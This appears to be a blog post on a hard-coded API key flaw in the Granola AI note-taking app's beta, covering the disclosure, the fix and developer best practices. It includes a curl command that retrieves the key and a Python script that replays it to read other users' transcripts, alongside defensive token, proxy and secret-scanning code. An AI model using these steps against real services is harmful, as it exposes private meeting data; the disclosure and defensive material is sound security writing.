The Hidden Dangers of AI Note-Taking Apps: A Cautionary Tale
How a Hardcoded API Key in Granola AI Exposed Users’ Private Meeting Transcripts
In early 2025, a critical security flaw was discovered in the beta version of Granola, an AI-powered note-taking application. The vulnerability was a hard-coded API key in the app’s code that potentially allowed unauthorized access to users’ private meeting transcripts. Although the issue was promptly addressed before the public release, it raises serious concerns about the security practices of AI applications that handle sensitive data.
🔍 The Vulnerability: Hard-Coded API Key Exposure
Security researchers identified that Granola’s macOS desktop client contained a hard-coded API key for AssemblyAI, the transcription service used by the app. This key was accessible through an unauthenticated endpoint, enabling potential attackers to retrieve it with a simple cURL request:
# No authentication required: any client can fetch the feature flags
curl -X POST https://api.granola.ai/v1/get-feature-flags \
  -H "X-Client-Version: 5.226.0" | jq '.[] | select(.feature=="assembly_key")'
With this key, an attacker could call the /transcript API endpoint and download text transcripts of other users’ meetings, with no credentials or user interaction required. Notably, audio recordings remained inaccessible, which limited the scope of the exposure.
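The write-up stops at retrieving the key, but assuming it was an ordinary account-scoped AssemblyAI key, replaying it would be as simple as the Python sketch below. The key value is a placeholder and the account-wide scope is an assumption; the endpoints themselves are AssemblyAI’s public v2 API.

import requests

# Placeholder: the key recovered from the feature-flags response above
LEAKED_KEY = "leaked-assemblyai-key"
BASE = "https://api.assemblyai.com/v2"
HEADERS = {"authorization": LEAKED_KEY}

# An account-scoped key lists every transcript created under the account,
# regardless of which end user the meeting belonged to.
page = requests.get(f"{BASE}/transcript", headers=HEADERS, params={"limit": 10}).json()

for item in page.get("transcripts", []):
    detail = requests.get(f"{BASE}/transcript/{item['id']}", headers=HEADERS).json()
    if detail.get("status") == "completed":
        # Someone else's meeting, no user credentials involved
        print(detail["text"][:200])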
🛠️ Response and Mitigation
Upon disclosure, Granola’s development team acted swiftly:
Key Revocation: The exposed API key was revoked within minutes of the report.
Endpoint Securing: The vulnerable endpoint was patched to prevent unauthorized access.
Security Enhancements: The app’s feature-flag delivery system was updated to use signed, short-lived tokens, reducing the risk of similar vulnerabilities in the future (a sketch of this pattern follows below).
These measures were implemented before the app’s general release, ensuring that the majority of users were not affected.
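Granola has not published the details of its new scheme, so the following is only a minimal sketch of the general pattern it describes: a signed JWT with a tight expiry and a narrow audience, minted server-side per client. It uses the PyJWT library, and every name and lifetime here is an illustrative assumption.

import time
import jwt  # PyJWT: pip install pyjwt

SIGNING_KEY = "server-side-secret"  # stays on the server, never ships in the client

def mint_feature_flag_token(client_id: str, ttl_seconds: int = 300) -> str:
    # A short expiry bounds how long a captured token remains useful
    now = int(time.time())
    claims = {
        "sub": client_id,
        "aud": "feature-flags",  # useless against any other endpoint
        "iat": now,
        "exp": now + ttl_seconds,
    }
    return jwt.encode(claims, SIGNING_KEY, algorithm="HS256")

def verify_feature_flag_token(token: str) -> dict:
    # Raises jwt.ExpiredSignatureError or jwt.InvalidAudienceError on bad tokens
    return jwt.decode(token, SIGNING_KEY, algorithms=["HS256"], audience="feature-flags")

Even if such a token leaked, it would expire within minutes and would grant access to nothing beyond the feature-flag endpoint.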
📈 Broader Implications for AI Applications
The Granola incident highlights a pervasive issue in AI application development: how sensitive data is handled. As AI tools integrate ever deeper into workflows, capturing audio, video, and text, the potential impact of a single security lapse grows.
Investments in AI meeting-assistant startups have surged, with more than $800 million raised in recent years. Many of these applications rely on third-party transcription services, which makes robust security protocols for protecting user data all the more essential.
🧠 Best Practices for Users and Developers
For Users:
Assume Potential Exposure: Treat any recorded information as potentially accessible to unauthorized parties.
Limit Sensitive Discussions: Avoid discussing confidential topics in environments where AI transcription tools are active.
Regularly Update Applications: Keep AI tools up to date to benefit from the latest security patches.
For Developers:
Avoid Hard-Coding Credentials: Manage API keys and other secrets server-side rather than embedding them in shipped binaries (see the first sketch after this list).
Conduct Regular Security Audits: Periodically review codebases for potential vulnerabilities, including automated secret scanning in CI (see the second sketch after this list).
Implement Short-Lived Tokens: Use tokens with limited lifespans, as in the earlier sketch, to minimize the window of opportunity for potential exploits.
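To make the first point concrete, here is a generic server-side sketch, not Granola’s implementation: the vendor key is read from the environment (or a secrets manager such as Vault or AWS Secrets Manager), and the backend proxies transcription requests so shipped clients never see the raw key. Apart from AssemblyAI’s public transcript-creation endpoint, every name here is an assumption.

import os
import requests

# The vendor key lives only in server-side configuration,
# never in the client binary that ships to users.
ASSEMBLYAI_KEY = os.environ["ASSEMBLYAI_API_KEY"]

def start_transcription(audio_url: str) -> str:
    # The backend makes the call on the client's behalf,
    # so the raw key never leaves the server.
    resp = requests.post(
        "https://api.assemblyai.com/v2/transcript",
        headers={"authorization": ASSEMBLYAI_KEY},
        json={"audio_url": audio_url},
    )
    resp.raise_for_status()
    return resp.json()["id"]  # job id the backend tracks per user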
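For the audit point, dedicated scanners such as gitleaks or truffleHog are the right tools, but even a crude check wired into CI catches the most common mistakes. A toy sketch, with a deliberately rough pattern:

import re
import sys
import pathlib

# A rough pattern for common credential shapes; real scanners use many more
SECRET_PATTERN = re.compile(
    r"(api[_-]?key|secret|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{20,}['\"]", re.I
)

def scan(root: str) -> int:
    hits = 0
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in {".py", ".js", ".ts", ".swift", ".json"}:
            continue
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if SECRET_PATTERN.search(line):
                print(f"{path}:{lineno}: possible hard-coded secret")
                hits += 1
    return hits

if __name__ == "__main__":
    # Non-zero exit fails the CI job when a likely secret is found
    sys.exit(1 if scan(sys.argv[1] if len(sys.argv) > 1 else ".") else 0)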
But honestly, do you really need all these note-takers? My best recommendation is to avoid them completely.
🔍 TL;DR Summary
Issue: Granola’s beta version contained a hard-coded API key, exposing user transcripts.
Impact: Limited to beta (TestFlight) users; no audio data was compromised.
Resolution: The vulnerability was promptly addressed before public release.
Takeaway: The incident underscores the importance of secure credential management in AI applications handling sensitive data.